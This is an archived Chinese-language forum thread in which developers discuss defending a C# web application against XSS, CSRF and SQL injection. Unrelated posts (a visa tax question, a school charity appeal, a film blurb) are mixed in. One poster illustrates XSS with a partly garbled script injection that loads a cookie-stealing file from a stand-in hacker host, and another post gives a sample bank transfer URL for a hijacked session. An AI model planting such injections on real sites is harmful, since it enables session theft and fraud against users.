c# project 防止hacker攻击，大家是用什么framework？ (转载) - 未名空间MITBBS历史存档

国际科技财经博客移民网络热点娱乐民生时事公众号

Redian新闻

>未名空间

>Programming - 葵花宝典

c# project 防止hacker攻击，大家是用什么framework？ (转载)

c# project 防止hacker攻击，大家是用什么framework？ (转载)# Programming - 葵花宝典

A*n2015-07-11 07:07

1 楼

老婆H4签证，需要我的1040表。但我去年的1040提交的时候有一项算错了，后来IRS给
我寄了封信、我又补交了一些税。
在这种情况下，我是不是应该自己把1040修改成正确的表格，然后用修改过后的表格申
请呢？
我打算让老婆把原来的表格、IRS的信、以及修改过后的表格一并提交。这样是不是更
好？
谢谢高人指点！

a*r2015-07-11 07:07

2 楼

【以下文字转载自 Donation 讨论区】
发信人: mitOCEF (帮帮孩子), 信区: Donation
标题: 新春佳节，请继续关注山区教育，OCEF 项目更新
发信站: BBS 未名空间站 (Sun Jan 30 13:25:34 2011, 美东)
http://www.causes.com/causes/375784-ocef-overseas-china-educati
Raise $5771 to purchase books, desks and lighting for West Lake Elementary
School
西湖小学，是一所已有30多年历史的民办小学，座落于织金县城关镇西湖村，是县城关
镇一个办学点，离县城中心近3公里，多年来一直没有教室，都是租用村民的房屋作为
教室给孩子们上课，也没有任何的学生活动场所及其他教育附属设施。
2年前，西湖学校姚老师连同村里的几名其他老师一起筹资，亲手修建了现在的西湖小
学。学校从开始的3个班22个学生，扩展到现在的7个班184个学生。学生来自周边的各
个村寨，最远的距离学校有8公里的山路。
学校教室不够，只能租用边上的民房作为五年级的教师和老师的办公室。
租用的民房采光很差，白天上课也需要开灯才能看见。
学校自己修建的教室，因为经费有限，不仅没有电灯，屋顶还漏风。
目前西湖小学有教师8人（全是民办教师，4名大专文化，4名高中文化），条件虽然简
陋，但是老师们都很努力工作。
目前的在校生有184名（幼儿班至六年级6个教学班），主要来自4个行政村（西湖村，
北门村，水依村，四方村，大部分是流动人口的孩子及贫困家庭的孩子），离校最远的
学生每天将近有5-6公里的路，来回学校一趟近10公里。
学生学习很认真，每年毕业的学生都以优秀的成绩进入织金三中、四中、五中、六中。
后续的可资助项目
1、图书资助：3000-5000
在这个学校教了二十多年的姚老师很希望能有一些书，这样，学生们的课外生活会丰富
些。这个学校距离明华小学不远，可以图书交换。
2、课桌资助：2.3万-3万
3、照明工程：给学校目前没有通电的6间教室通电，让教室亮起来。需要资金3000元（
包括1年大概1800元的电费）。
The West Lake Elementary School, located at the West Lake Village,
approximately two miles from the county seat of Zhijin, Guizhou Province, is
a minban (non-government-sponsored) school that has been in operation for
more than 30 years. Until recently, the school had no facilities of its own,
neither classrooms nor playgrounds, and had to lease various buildings from
local villagers to carry out its functions.
Two years ago, Mr. Yao, a teacher at West Lake, raised the necessary funds
in collaboration with several other teachers and built the existing
schoolhouse with their own hands. Today, the school has expanded from the
original three classes with 22 pupils to the current seven classes,
including a kindergarten class, with a total student body of 184. All of the
pupils come from the surrounding villages and hamlets, and some of them
have to travel miles of treacherous mountain roads to reach the schoolhouse.
Because of the limitation in available space, the fifth grade classroom and
the teachers' office are still housed in a leased building nearby. The
leased classroom is so poorly fenestrated that the light has to remain on
throughout the day. Due to the lack of funding, the school's own building
has no electrical lights, and the junctions between its roof and walls
remain unsealed.
At the present time, the school retains a staff of eight teachers, four of
whom are vocational school graduates, while the other four hold high school
diplomas. Unlike most teachers in urban areas, theses rural minban teachers
are not considered government employees and earn very modest wages. Despite
the lack of resources and the difficult teaching environment, the eight
teachers have done their best to give the pupils a better chance in life.
The student body of 184 is divided into seven classes: a kindergarten class,
and the first through the sixth grades. The majority of them are children
of migrant workers or other impoverished parents who live in the four
villages in the surrounding area. Some of them travel as many as seven miles
for the daily trip to and from school.
In spite of the hardships, the pupils study diligently, and each year the
graduates from West Lake get admitted into Zhijin County Middles School Nos.
3, 4, 5 and 6 with excellent grades.
Projects in need of sponsorship:
1.Books: US$760. Mr. Yao, who has been teaching at West Lake for more than
20 years, has expressed a strong wish for books to enrich the pupils'
extracurricular activities. The West Lake Elementary School is located in
close proximity to the Minghua Elementary School, with which it would be
able to establish a book exchange program.
2.Desks: US$4,555.
3.Lighting: US$456, including approximately US $274 for the first year's
power supply. The goal is to electrify the six classrooms in the schoolhouse
, and literally brighten the lives of the pupils.
孩子们
漏风的教室
租来的教室，没有阳光，白天也得开灯
校舍
租来的教室办公室和五年级教室
认真上课的老师以及教学计划

x*i2015-07-11 07:07

3 楼

#《德州巴黎》#剧情Paris, Texas(1984)。一句话剧情：Travis在德州的沙漠里独自行
走了好几年，回到文明世界却三缄其口，不肯透露这几年发生了什么……推荐理由：“
德国新电影四杰”之一维姆·文德斯作品。37届戛纳国际电影节金棕榈奖。爱情的尽头
没有回头路，关于男人的终极孤独……

c*e2015-07-11 07:07

4 楼

【以下文字转载自 DotNet 讨论区】
发信人: convergence (Rex), 信区: DotNet
标题: c# project 防止hacker攻击，大家是用什么framework？
发信站: BBS 未名空间站 (Sat Jul 11 18:35:05 2015, 美东)
如果什么framework(比如telerik, sencha)都不用，只用ado.net之类的ms自己提供的
framework,能防止hacker 攻击吗？比如xss, csrf.

a*r2015-07-11 07:07

5 楼

星星们帮忙到donation版顶下贴
我发包子：）

d*d2015-07-11 07:07

6 楼

我也喜欢，二十多年前听的广播剧版

k*02015-07-11 07:07

7 楼

和framework关系不大. framework不能保证你写的code没有漏洞。
防止攻击通常从两点入手
1, 程序上的漏洞 - 看怎样写code防止hacker利用程序里的漏洞攻击，比如sql
injection.
2, 系统设置上的漏洞 - 调整http server settings，比如file read/write access
rights，采用的authentication type, turn off directory browsing之类的。
另外如果采用了第三方plugin的话还要注意那些东西的漏洞，最好把access rights分
开设，WP sites就常常因为plugin中招。

【在 c*********e 的大作中提到】

: 【以下文字转载自 DotNet 讨论区】
: 发信人: convergence (Rex), 信区: DotNet
: 标题: c# project 防止hacker攻击，大家是用什么framework？
: 发信站: BBS 未名空间站 (Sat Jul 11 18:35:05 2015, 美东)
: 如果什么framework(比如telerik, sencha)都不用，只用ado.net之类的ms自己提供的
: framework,能防止hacker 攻击吗？比如xss, csrf.

s*i2015-07-11 07:07

8 楼

c*e2015-07-11 07:07

9 楼

简历上写做过wordpress website,都不好意思应聘程序员吧？
sql injection都是老早以前的事了。现在的xss,csrf真是厉害。比如你写个可以留言
的網頁，人家留言的时候，加入

http://hackerwebsite.com/getyourcookie.js" />，那你的网站的cookie的信息就全部被人家盗取了。

【在 k**0 的大作中提到】

: 和framework关系不大. framework不能保证你写的code没有漏洞。
: 防止攻击通常从两点入手
: 1, 程序上的漏洞 - 看怎样写code防止hacker利用程序里的漏洞攻击，比如sql
: injection.
: 2, 系统设置上的漏洞 - 调整http server settings，比如file read/write access
: rights，采用的authentication type, turn off directory browsing之类的。
: 另外如果采用了第三方plugin的话还要注意那些东西的漏洞，最好把access rights分
: 开设，WP sites就常常因为plugin中招。

l*32015-07-11 07:07

10 楼

好的。。。顶。。。

k*02015-07-11 07:07

11 楼

原理是一样的，这种可以自己加一层script去filter. 只有想不到没有做不到。
WP一样可以自己加custom type, 想搞就能搞得复杂，别看不起WP啊。
[在 convergence (Rex) 的大作中提到：]
：简历上写做过wordpress website,都不好意思应聘程序员吧？
：
：...........

a*r2015-07-11 07:07

12 楼

谢谢各位星星支持，好开心！
今天晚点来发包子：）

N*n2015-07-11 07:07

13 楼

曾经为了安全用过一个COOKIE-LESS框架，巨难受。

r*s2015-07-11 07:07

14 楼

No frame work can save you. Yet there are principles
To follow
1. Verify every single field that can be manipulated
By user to prevent injection attacks, including SQL injection
Or xss
2. Separate important operation (e.g.money transfer) into two steps and
ensure that first step can not be skipped to defend against csrf
Owasp web site has loads of valuable information

【在 c*********e 的大作中提到】

: 简历上写做过wordpress website,都不好意思应聘程序员吧？
: sql injection都是老早以前的事了。现在的xss,csrf真是厉害。比如你写个可以留言
: 的網頁，人家留言的时候，加入

http://hackerwebsite.com/getyourcookie.js" />，那你的网站的cookie的信息就全部被人家盗取了。

c*e2015-07-11 07:07

15 楼

用session不就行了，客户端只有session id。

【在 N********n 的大作中提到】

: 曾经为了安全用过一个COOKIE-LESS框架，巨难受。

j*f2015-07-11 07:07

16 楼

developers trust themselves to be capable of thwarting web attacks, that's
the real problem of security

N*n2015-07-11 07:07

17 楼

Session id like cookies can be stolen by hacker's script.

【在 c*********e 的大作中提到】

: 用session不就行了，客户端只有session id。

b*i2015-07-11 07:07

18 楼

cookie 难道不是用户的信息?盗取是什么意思?

【在 c*********e 的大作中提到】

http://hackerwebsite.com/getyourcookie.js" />，那你的网站的cookie的信息就全部被人家盗取了。

c*e2015-07-11 07:07

19 楼

比如说你登录了一个银行网站，hacker盗取了你的cookie/session信息，然后他自己通
过一个http://bankname.com/transfermoney?id=12345&amount=10000000
来把你的帐号里的钱转走。

【在 b***i 的大作中提到】

: cookie 难道不是用户的信息?盗取是什么意思?

c*e2015-07-11 07:07

20 楼

在公共的计算机上登录，没有log out,hacker就能够得到session id, cookies.这个没
办法的事情。
所以，一定要记得log out.如果没log out带来的损失，只能怪忘记log out.
如果是hacker在input box里加入了javascript代码，那就只能filter user input了。

【在 N********n 的大作中提到】

:
: Session id like cookies can be stolen by hacker's script.

b*i2015-07-11 07:07

21 楼

我在Azure建了网站，有漏洞，然后你说的Hacker是盗取我的cookie还是我用户的？怎
么盗取？这个cookie不是都在客户端浏览器里吗？
然后，你说的我在我登陆银行网站，假如是在我家，那是Hacker要到我家才能盗取我
cookie信息吧？在公共计算机，如果没有退出登录，那么确实其他人可以得到很多信息
的。这个我理解。

【在 c*********e 的大作中提到】

: 比如说你登录了一个银行网站，hacker盗取了你的cookie/session信息，然后他自己通
: 过一个http://bankname.com/transfermoney?id=12345&amount=10000000
: 来把你的帐号里的钱转走。

a92015-07-11 07:07

22 楼

咋盗？哪有那么容易

【在 c*********e 的大作中提到】

g*g2015-07-11 07:07

23 楼

银行没有那么容易，论坛里你能看到其他人的内容，就容易一些

【在 a9 的大作中提到】

: 咋盗？哪有那么容易

a92015-07-11 07:07

24 楼

@convergence说的无比简单一样。
现在浏览器防跨站已经相当好了，想拿到其它网站的cookie基本不可能。

【在 g*****g 的大作中提到】

: 银行没有那么容易，论坛里你能看到其他人的内容，就容易一些

c*e2015-07-11 07:07

25 楼

iframe还是可以有办法拿到parent的信息;parent也可以拿到iframe的信息。

【在 a9 的大作中提到】

: @convergence说的无比简单一样。
: 现在浏览器防跨站已经相当好了，想拿到其它网站的cookie基本不可能。

ET2015-07-11 07:07

26 楼

本地有个startup WP Engine，就是在WP上给人做定制服务

【在 k**0 的大作中提到】

: 原理是一样的，这种可以自己加一层script去filter. 只有想不到没有做不到。
: WP一样可以自己加custom type, 想搞就能搞得复杂，别看不起WP啊。
: [在 convergence (Rex) 的大作中提到：]
: ：简历上写做过wordpress website,都不好意思应聘程序员吧？
: ：
: ：...........

k*02015-07-11 07:07

27 楼

not cross domain

【在 c*********e 的大作中提到】

: iframe还是可以有办法拿到parent的信息;parent也可以拿到iframe的信息。

H*g2015-07-11 07:07

28 楼

1: AntiForgeForm
2: In Web.config, don't set . Set it to medium.
3: Don't visit database table directly. Create a view and visit the view
only.
4: User Stored Procedure to write data.
5: block HTML tag input.
3,4 is really stupid and boring, but it works very well.
Try to read the STIG. It explains what you should do in details.

c*e2015-07-11 07:07

29 楼

我说的就是cross-domain.我自己亲自做过，能。你不知道方法而已。

not cross domain

【在 k**0 的大作中提到】

: not cross domain

c*e2015-07-11 07:07

30 楼

现在谁还用stored procedure啊？其实mvc里面用model,也能防止sql injection.
AntiForgeForm,具体怎么做？象c# .net mvc那样？

【在 H*******g 的大作中提到】

: 1: AntiForgeForm
: 2: In Web.config, don't set . Set it to medium.
: 3: Don't visit database table directly. Create a view and visit the view
: only.
: 4: User Stored Procedure to write data.
: 5: block HTML tag input.
: 3,4 is really stupid and boring, but it works very well.
: Try to read the STIG. It explains what you should do in details.

c*e2015-07-11 07:07

31 楼

5: block HTML tag input. 你是说要block html tag,还是说要把 < > 变成
< >

【在 H*******g 的大作中提到】

k*02015-07-11 07:07

32 楼

如果你做的网页能随便被外人套个Iframe就hack那只是你自己水平的问题。
[在 convergence (Rex) 的大作中提到：]
：我说的就是cross-domain.我自己亲自做过，能。你不知道方法而已。
：
：...........

c*e2015-07-11 07:07

33 楼

所以，iframe是一个很危险的东西，最稳妥的办法就是，只用它来显示同一个domain的
东西，连subdomain的东西也不要用iframe.

【在 k**0 的大作中提到】

: 如果你做的网页能随便被外人套个Iframe就hack那只是你自己水平的问题。
: [在 convergence (Rex) 的大作中提到：]
: ：我说的就是cross-domain.我自己亲自做过，能。你不知道方法而已。
: ：
: ：...........